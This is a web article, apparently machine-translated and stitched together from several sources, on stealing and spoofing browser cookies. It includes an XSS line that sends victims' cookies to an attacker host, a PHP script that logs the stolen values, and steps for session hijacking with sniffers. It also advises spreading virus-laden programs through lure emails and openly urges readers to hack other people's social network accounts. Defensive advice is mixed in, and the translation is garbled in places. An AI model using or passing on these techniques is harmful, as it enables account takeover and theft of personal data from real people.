Download a program to steal cookies. An easy way to steal a cookie. Cookie Hacking Tools and Techniques
What is a cookie?
There is a mechanism that allows the http server to store on the user's computer some text information and then contact her. This information called a cookie. In fact, each cookie is a pair: the name of the parameter and its value. Each cookie is also assigned the domain to which it belongs. For security purposes, in all browsers, the http server is only allowed to access its own domain cookie. Additionally, cookies can have an expiration date, in which case they will be stored on the computer until this date, even if all browser windows are closed.
Why are cookies important?
In all multi-user systems, cookies are used to identify the user. Or rather, the current connection of the user with the service, the user session. If someone recognizes your cookies, they can log in on your behalf. Because in currently very few Internet resources check the change of the IP address during one user session.
How to change or change cookies?
Browser developers do not provide built-in tools for editing cookies. But you can get by with a regular notepad (notepad).
Step 1: create a text file with text
Windows Registry Editor Version 5.00
@="C:\\IE_ext.htm"
We save it under the name IE_ext.reg
Step 2: Using the created file, add changes to the Windows registry.
Step 3: create a text file with text
<
script
language="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);
external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);
Save it as C:\IE_ext.htm
Step 4: We go to the website of interest to us.
Step 5: Right click mouse clicks on a free space on the page and select a menu item "Working with Cookies". Allow access to the clipboard. Your cookies for this site will be placed on the clipboard. You can paste their notepad (notepad) and see.
Step 6: To change some cookie, edit the C:\IE_ext.htm file, replacing testname in the name of the cookie, testvalue- on its meaning, testdomain.ru- to the website domain. Add more lines like this if necessary. For the convenience of control, I added the output of the current cookies to the script before and after the change: alert(external.menuArguments.document.cookie);
Step 7: Run Step 5 again and then refresh the page.
Bottom line: we will go to this Internet resource with updated cookies.
How to steal cookies with JavaScript?
If an attacker managed to find a way to execute an arbitrary JavaScript script on the victim's computer, then he can read the current cookies very easily. Example:
varstr=document.cookie;
But will he be able to transfer them to his site, because, as I pointed out earlier, a JavaScript script will not be able to access a site located in another domain without additional confirmation? It turns out that a JavaScript script can load any image located on any http server. At the same time, transfer any textual information in the download request to this picture. Example: http://hackersite.ru/xss.jpg?text_info So if you run this code:
varimg= newImage();
img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);
then the cookies will be in the request to download the "picture" and "leave" to the attacker.
How to handle such requests to upload a "picture"?
An attacker only needs to find a hosting with php support and place code like this:
$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>
Then all query parameters to this script will be saved in the file log.txt. It remains only in the previously described JavaScript script to replace http://hackersite.ru/xss.jpg to the path to this php script.
Outcome
I have shown only the simplest way to exploit XSS vulnerabilities. But it proves that the presence of at least one such vulnerability on a multi-user Internet site can allow an attacker to use its resources on your behalf.
The picture shows that the cookie contains the string wordpress_logged_in_263d663a02379b7624b1028a58464038=admin. This value is in an unencrypted form in a cookie and is easy to intercept using the Achilles utility, but as a rule, in most cases, only the hash of a particular entry can be seen in Achilles. Before sending a request to the server, you can try to replace this string with any similar one (although in this case it makes no sense) - the number of attempts is not limited. Then, by sending this request to the server using the Send button, you can get a response from the server, destined for the administrator.
In the previous example, you can use direct user ID spoofing. In addition, the name of the parameter whose value substitution provides additional features hacker, can be: user (for example, USER=JDOE), any expression with an ID string (for example, USER=JDOE or SESSIONID=BLAHBLAH), admin (for example, ADMIN=TRUE), session (for example, SESSION=ACTIVE), cart (for example, CART=FULL), as well as expressions such as TRUE, FALSE, ACTIVE, INACTIVE. Typically, the format of cookies is very dependent on the application for which they are used. However, these tips for finding application flaws with cookies work for almost all formats.
Countermeasures against extracting information from cookies performed on the client side
In general, the user should be wary of Web sites that use cookies for authentication and storage of sensitive data. You also need to remember that a Web site that uses cookies for authentication must support at least the SSL protocol for encrypting the username and password, because in the absence of this protocol, the data is transmitted in unencrypted form, which allows them to be intercepted using simple software to view data sent over the network.
Kookaburra Software has developed a tool to facilitate the use of cookies. The tool is called CookiePal ( http://www.kburra.com/cpal.html (See www.kburra.com)). This program is intended to alert the user when a Web site attempts to install a cookie on a machine, and the user can choose to allow or deny this action. Similar cookie blocking features are available in all browsers today.
Another reason for regularly installing web browser updates is that security flaws in these programs are constantly being discovered. For example, Bennet Haselton and Jamie McCarthy created a script that retrieves cookies from a client's machine when a link is clicked. As a result, all the contents of the cookies that are on the user's machine become available.
This kind of hack can also be done with the descriptor
In order to prevent such things from threatening our personal data, I do it myself and I advise everyone to always update software that works with HTML code (e-mail clients, media players, browsers, etc.).
Many people prefer to simply block cookies, however, most Web sites require cookies to be able to browse. Conclusion - if in the near future there will be an innovative technology that allows you to do without cookies, programmers and administrators will breathe a sigh of relief, but for now cookies remain a tasty morsel for a hacker! This is true, because a better alternative does not yet exist.
Server Side Countermeasures
In the case of server security recommendations, experts give one simple advice: do not use the cookie mechanism unless absolutely necessary! Particular care must be taken when using cookies that remain on the user's system after the session has ended.
Of course, it is important to understand that cookies can be used to secure Web servers to authorize users. If the application you are developing does need to use cookies, then this mechanism should be configured so that each session uses different keys with a short validity period, and also try not to put information in these files that can be used by hackers for hacking (such as ADMIN=TRUE).
In addition, for greater security when working with cookies, you can use encryption to prevent sensitive information from being extracted. Of course, encryption does not solve all security problems when working with cookie technology, however, this method will prevent the most simple hacks described above.
Have you noticed that when you return to a site that you have already visited, that the site recognizes you and opens with the settings you applied last time? Yes, and quite often? This happens thanks to cookies, which store information about visitors such as login, password, session ID and other variables required to identify the visitor and display page content according to the user's preferences selected by him during his last visit to the resource. The WebCookiesSniffer program will show the user the cookies and their contents of the sites that are viewed by the user in the browser.
Viewing Cookies
You open a website and WebCookiesSniffer captures cookies in real time. The utility adds all caught cookies to a table that stores data about the host, the request path, overall length cookie file, the number of variables in the cookie file, and the Cookie string itself with the names of variables and values. The collected information about cookies WebCookiesSniffer can save to a text file. The program also has the ability to generate an HTML report on all or selected cookies. For the program to work, you need to install the WinPcap driver (it is in the archive along with WebCookiesSniffer). To language WebCookiesSniffer programs became Russian, copy the file WebCookiesSniffer_lng.ini (also included in the archive) to the directory with the utility.
Screenshots of WebCookiesSniffer
|
|
|
|
Ways to steal cookies
Cookie hacking works great and is used by many hackers. If you also want to try it, but do not know what to do, read our recommendations.
What are cookies?
This is information about a user's visit to a particular site. It is kept in a separate text document. You can find a variety of information there. Including logins, passwords, addresses mailboxes and phone numbers. That is why burglars are trying to get their hands on these documents. To steal the right materials, hackers resort to different methods.
Ways to steal cookies
XSS vulnerability
It can be found and used on any site. When a specialist finds a vulnerability, he injects into it special code. Depending on the purpose, the codes are different, they are written for a specific resource. When the user visits this page and refreshes it, all changes are applied. Code start to act - is introduced into the computer of the victim and collects all necessary information from browser.
To enter code, you can use any type of vulnerability - an error on a web resource, in a browser or computer system.
There are 2 types of XSS attacks:
Passive - directed to the page script. In this case, you need to look for vulnerabilities in the page elements. For example, a tab with dialogs, a search box, a video catalog, etc.
Active - they should be looked for on the server. Especially often they are on various forums, blogs and chats.
How to force a person to apply XSS?
The task is not easy, because often you need to click on the link with it to activate the code. You can disguise the link and send it in a letter along with an interesting offer. For example, offer a big discount in an online store. You can also embed all this in the picture. The user is very likely to view it and not suspect anything.
Installing a sniffer
This is the introduction of specialized programs for tracking traffic on someone else's device. The sniffer allows you to intercept transmitted sessions with other people's data. So you can get all the logins and passwords, addresses, any important information transmitted over the network by the user. At the same time, attacks are most often carried out on unprotected HTTP data. Unsecured wi-fi works well for this.
There are several ways to implement a sniffer:
- Copy traffic;
- Data analysis using traffic attacks;
- Listening to interfaces;
- Implementation of a sniffer into a channel break.
All data is stored on the web server in its original form. If you change them, this will be considered a substitution. All received materials can be used on another computer. Thus you will receive full access to the user's personal data. Cookies can be modified using browser settings, add-ons or special programs. Editing is also possible in any standard notepad on a PC.
Stealing cookies with a virus
Experts advise not to use cookies unless there is a special need for it. If it is possible to disable them, it is best to do so. This is because cookies are very vulnerable. They are often stolen by thieves. From these files, you can get a huge amount of personal sensitive information that will be used against a person. The most dangerous type of files are those that remain in the system after the session has ended.
Cookies are often stolen using a virus utility. This is done quite simply. Any safe utility is embedded with a virus that collects certain materials on the computer. The virus program will be connected to its host's server. The program must be configured so that the browser uses it as a proxy server.
When the program gets on the victim's PC, it will automatically start collecting all the stored data and send it to you.
Viruses are different, their functions may also differ. Some allow you to completely control the browser and view any information. Others are capable of stealing protected materials. Still others collect only unsecured data.
You may have difficulty with the introduction of a virus program on someone else's computer. You need to force the user to download it and run it. Here you can either send him a letter with a link to the program, or pass off the program as safe and wait for the person to download it from your site.
How to protect cookies from theft?
Most of the web resources are not secure enough. Hackers easily find vulnerabilities and bugs on these platforms.
Cookie protection rules:
- Bind the computer id to the current session. Then, when you enter the site from a third-party device, a new session will be started, and data from the previous one cannot be retrieved.
- Bind the session to the browser. The same principle as in the previous paragraph will work.
- Encrypt the parameters transmitted over the network. Then the information stored in the document cannot be understood. It will be useless to the one who intercepted it. This technique will not protect you 100%, some experts can decipher any material.
- Create separate folder for indexes.
How to find out the password from someone else's account through cookies?
To get someone else's data for authorization, you must first get to the file in which they were saved.
For those who use Mozilla Firefox you need to go to the tools tab, which is located in the main menu. Further in the system settings you will find the "Protection" section, and there you should look for all the important information about accounts in social networks. All passwords are hidden, so click on the "show" button. Here you can install protection and put a special code. Then no one except you will receive this information.
In Opera, only usernames are available for general viewing. But in the menu you can find the password manager and view everything stored on the computer. Full list is in the manager. In order to gain access to passwords, you need to install an additional extension.
V Google Chrome all these materials can be seen in the advanced settings. There is a tab with all saved cookies.
Unfortunately the standard Internet browser Explorer does not have such features. To find out information about the web platforms visited by the owner of the PC, you need to download a special program. It can be found on the Internet for free, it is completely safe, but it is better to download it from trusted sources. Do not forget that any program should be checked by an antivirus. This is especially true for those utilities that work with passwords.
This technique is only suitable for those who have physical access to the victim's computer. You can also find out someone else's password if the person logged in to the platform through your PC and saved his data.
Programs to steal cookies
There are many hacker forums on the Internet where hackers communicate with each other. People go there hoping to get free help. It is there that you can find a huge number of different programs for hacking. We want to warn you that you should not trust these programs. Utilities for remotely stealing cookies from someone else's device are dummies or virus programs. If you download this software on your PC, then most likely you yourself will fall into the trap of a scammer. Free place programs crooks. Thus, they distribute virus software and gain control over other people's PCs. In general, such programs are a scam, you will understand this by their interface and content. If you are going to use any software for extracting files, then let it be sniffers. Of course, they are not easy to use. And it's not easy to find a good sniffer on the Internet. But such software is available from specialists who can sell it to you for money. Remember that there are many scammers, everyone has their own tricks. You should trust only proven hackers who have a good reputation, have reviews and have their own website.
In conclusion, I would like to note that stealing cookies is a really powerful method, the effectiveness of which is very high. If you want to hack someone's profile on a social network or messenger, be sure to consider this option. This method works best when you can use the victim's computer. Getting materials at a distance is much more difficult, but you can take our advice and try to put this method into practice.
In chapter
Have you ever wondered how some Web sites personalize visitors? This can be expressed, for example, in remembering the contents of the "cart" (if this node is intended for the sale of goods) or in the way the fields of some form are filled in. The HTTP protocol that underpins the functioning of the World Wide Web does not have the means to keep track of events from one site visit to the next, so a special add-on was developed to be able to store such "states". This mechanism, described in RFC 2109, inserts special pieces of cookie data into transmitted HTTP requests and responses that allow Web sites to track their visitors.
These cookies may be remembered for the duration of the session ( per session), staying in random access memory within a single session and being deleted when the browser is closed, or even after a specified amount of time has elapsed. In other cases, they are permanent ( persistent), remaining on the user's hard disk in the form text file. They are usually stored in the Cookies directory (%windir%\Cookies on Win9x and %userprofile%\Cookies on NT/2000). It is not hard to guess that after hijacking cookies on the Internet, an attacker can impersonate a user this computer, or collect important information contained in these files. After reading the following sections, you will understand how easy it is to do this.
Interception of cookies
The most direct way is to intercept cookies as they are transmitted over the network. The intercepted data can then be used when logging into the appropriate server. Such a task can be solved using any packet interception utility, however, one of the best is the program of Lavrenty Nikula ( Laurentiu Nicula) SpyNet/PeepNet. SpyNet includes two utilities that work together. Program CaptureNet captures the packet itself and saves it to disk, and the PeepNet utility opens the file and converts it to a readable format. The following example is a fragment of a session restored by PeepNet, during which the cookie is used to authenticate and control access to browsing pages (names have been changed to preserve anonymity).
GET http://www.victim.net/images/logo.gif HTTP/1.0 Accept: */* Referrer: http://www.victim.net/ Host: www.victim.net Cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah
In the example above, you can see a cookie fragment placed in an HTTP request to the server. The most important field is cuid=, which specifies the unique identifier used to authenticate the user against www.victim.net. Assume that after that the attacker visits the victim.net site, obtains its own identifier and a cookie (it is assumed that the host does not place the cookie data in virtual memory, but writes it to HDD). The attacker can then open his own cookie and replace the cuid= field identifier in it with the one from the captured packet. In this case, when logging into the victim.net server, he will be treated as a user whose cookie data was intercepted.
Program Ability Peep Net reproducing the entire communication session or its fragment greatly facilitates the implementation of attacks of this type. With button Go get it! it is possible to re-retrieve the pages that were viewed by the user using his cookie data intercepted earlier by the CaptureNet program. In the dialog box of the PeepNet utility, you can see information about someone's executed orders. In this case, cookie data intercepted by the CaptureNet program is used for authentication. Notice the frame in the lower right corner of the session data dialog and the line that follows the Cookie: line. This is the cookie data used in authentication.
This is a pretty neat trick. In addition, the utility CaptureNet can provide a complete transcript of the traffic, which is almost equivalent to the capabilities of professional-grade utilities such as Sniffer Pro from Network Associates, Inc. However, the utility SpyNet Even better - you can get it for free!
Countermeasures
Beware of sites that use cookies to authenticate and store sensitive identification data. One tool to help protect you is Kookaburra Software's Cookie Pal, which can be found at http://www.kburra.com/cpal.html. This software can be configured to generate warning messages for the user when a Web site tries to use the cookie mechanism. In this case, you can "look behind the scenes" and decide whether to allow these actions. V Internet Explorer there is a built-in cookie support mechanism. To enable it, launch the Control Panel's Internet Options applet, go to the Security tab, select the Internet Zone item, set the Custom Level mode, and set the switch to Prompt for persistent and temporary cookie data. Setting the use of cookies in the Netscape browser is done using the command Edit › Preferences › Advanced and setting the Warn me before accepting a cookie or Disable cookies mode (Fig. 16.3). When accepting a cookie, you need to check if it has written to disk and see if the Web site collects information about users.
When visiting a site where cookies are used for authentication, you need to make sure that the initially reported name and password are encrypted with at least SSL protocol. This information will then appear in the PeepNet window, at least not in plain text.
The authors would prefer to refuse cookies completely if many frequently visited Web sites did not require this mode. For example, Microsoft's worldwide popular Hotmail service requires cookies for registration. Since this service uses several different servers in the authentication process, adding them to the Trusted Sites zone is not easy (this process is described in "Using Security Zones Wisely: A Common Solution to the Activex Control Problem"). In this case, the designation *.hotmail.com will help. Cookies are far from perfect solution HTML protocol incompleteness issues, however alternative approaches seem to be even worse (e.g. adding to URL identifier that can be stored on proxy servers). Until a better idea comes up, the only way out is to control cookies using the methods listed above.
Capture cookies via URL
Imagine something horrifying: Internet Explorer users click on specially crafted hyperlinks and become potential victims, risking their cookies being intercepted. Bennet Hazelton ( Bennett Haselton) and Jamie McCarthy ( Jamie McCarthy) from Peacefire, a teen organization that advocates for freedom of communication over the Internet, have published a script that brings this idea to life. This script retrieves cookies from client computer if its user clicks on a link contained in that page. As a result, the content of the cookie is made available to the operators of the Web site.
This feature can be misused by embedding IFRAME tags in the HTML code of a Web page, an HTML email message, or a newsgroup message. The following example, provided by security consultant Richard M. Smith, demonstrates the use of IFRAME handles with a utility developed by Peacefire.